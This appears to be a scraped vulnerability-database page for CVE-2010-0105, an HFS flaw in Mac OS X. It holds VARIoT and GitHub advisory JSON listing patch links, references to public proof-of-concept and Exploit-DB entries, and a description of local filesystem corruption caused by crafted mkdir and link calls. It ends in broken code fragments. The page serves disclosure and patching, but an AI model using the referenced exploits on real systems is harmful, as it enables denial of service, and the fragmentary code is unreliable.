        "id": "1024723",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447",
        "trust": 0.7
      },
      {
        "db": "NSFOCUS",
        "id": "14886",
        "trust": 0.6
      },
      {
        "db": "SREASONRES",
        "id": "20100423 MACOS X 10.6.3 FILESYSTEM HFS DENIAL OF SERVICE VULNERABILITY",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "126039",
        "trust": 0.2
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2013110059",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "134091",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "88859",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134090",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134710",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "12375",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-42710",
        "trust": 0.1
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2014040027",
        "trust": 0.1
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2005090063",
        "trust": 0.1
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2010040284",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "123948",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "db": "PACKETSTORM",
        "id": "123948"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "id": "VAR-201004-0093",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-11-23T19:55:28.460000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HT4435",
        "trust": 0.8,
        "url": "http://support.apple.com/kb/HT4435"
      },
      {
        "title": "HT4435",
        "trust": 0.8,
        "url": "http://support.apple.com/kb/HT4435?viewlocale=ja_JP"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-DesignError",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/39658"
      },
      {
        "trust": 2.0,
        "url": "http://securityreason.com/achievement_securityalert/83"
      },
      {
        "trust": 1.2,
        "url": "http://support.apple.com/kb/ht4435"
      },
      {
        "trust": 1.1,
        "url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00000.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id?1024723"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0105"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu331391"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0105"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/14886"
      },
      {
        "trust": 0.3,
        "url": "http://www.apple.com/macosx/"
      },
      {
        "trust": 0.2,
        "url": "http://cxsecurity.com/issue/wlb-2013110059"
      },
      {
        "trust": 0.2,
        "url": "http://cxsecurity.com/"
      },
      {
        "trust": 0.2,
        "url": "http://cert.cx/"
      },
      {
        "trust": 0.2,
        "url": "http://cxsecurity.com/cveshow/cve-2010-0105/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0105"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c"
      },
      {
        "trust": 0.1,
        "url": "http://cifrex.org/"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6799"
      },
      {
        "trust": 0.1,
        "url": "http://cert.cx/stuff/l2.c"
      },
      {
        "trust": 0.1,
        "url": "http://cxsec.org/"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c"
      },
      {
        "trust": 0.1,
        "url": "http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/cveshow/cve-2013-6799/"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/issue/wlb-2014040027"
      },
      {
        "trust": 0.1,
        "url": "https://developer.apple.com/library/mac/documentation/darwin/reference/manpages/man3/snprintf.3.html"
      },
      {
        "trust": 0.1,
        "url": "http://cvemap.org/"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/issue/wlb-2010040284"
      },
      {
        "trust": 0.1,
        "url": "http://cxsecurity.com/issue/wlb-2005090063"
      },
      {
        "trust": 0.1,
        "url": "http://en.wikipedia.org/wiki/hard_link"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "db": "PACKETSTORM",
        "id": "123948"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "db": "PACKETSTORM",
        "id": "123948"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-04-27T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "date": "2010-04-23T00:00:00",
        "db": "BID",
        "id": "39658"
      },
      {
        "date": "2010-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "date": "2014-04-06T16:22:11",
        "db": "PACKETSTORM",
        "id": "126039"
      },
      {
        "date": "2013-11-08T21:29:02",
        "db": "PACKETSTORM",
        "id": "123948"
      },
      {
        "date": "2010-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "date": "2010-04-27T15:30:01.217000",
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-12-10T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42710"
      },
      {
        "date": "2010-11-10T22:37:00",
        "db": "BID",
        "id": "39658"
      },
      {
        "date": "2010-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      },
      {
        "date": "2010-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      },
      {
        "date": "2024-11-21T01:11:32.463000",
        "db": "NVD",
        "id": "CVE-2010-0105"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apple Mac OS X of  hfs Service disruption in implementation  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-002403"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "39658"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-447"
      }
    ],
    "trust": 0.9
  }
}

ghsa-m3r9-2fp3-p448

Vulnerability from github

Published

2022-05-02 06:10

Modified

2022-05-02 06:10

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2010-0105"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2010-04-27T15:30:00Z",
    "severity": "MODERATE"
  },
  "details": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component.",
  "id": "GHSA-m3r9-2fp3-p448",
  "modified": "2022-05-02T06:10:12Z",
  "published": "2022-05-02T06:10:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-0105"
    },
    {
      "type": "WEB",
      "url": "http://lists.apple.com/archives/security-announce/2010//Nov/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/achievement_securityalert/83"
    },
    {
      "type": "WEB",
      "url": "http://support.apple.com/kb/HT4435"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/39658"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1024723"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2010-0105 (GCVE-0-2010-0105)

Vulnerability from cvelistv5

CERTA-2010-AVI-548

Vulnerability from certfr_avis

Description

Solution

fkie_cve-2010-0105

Vulnerability from fkie_nvd

gsd-2010-0105

Vulnerability from gsd

var-201004-0093

Vulnerability from variot

!/bin/bash

...

BSD process name corresponding to current thread: ls

https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html

A plain program performing a system call (link)

include

include

ghsa-m3r9-2fp3-p448

Vulnerability from github

Tags

Sightings

Nomenclature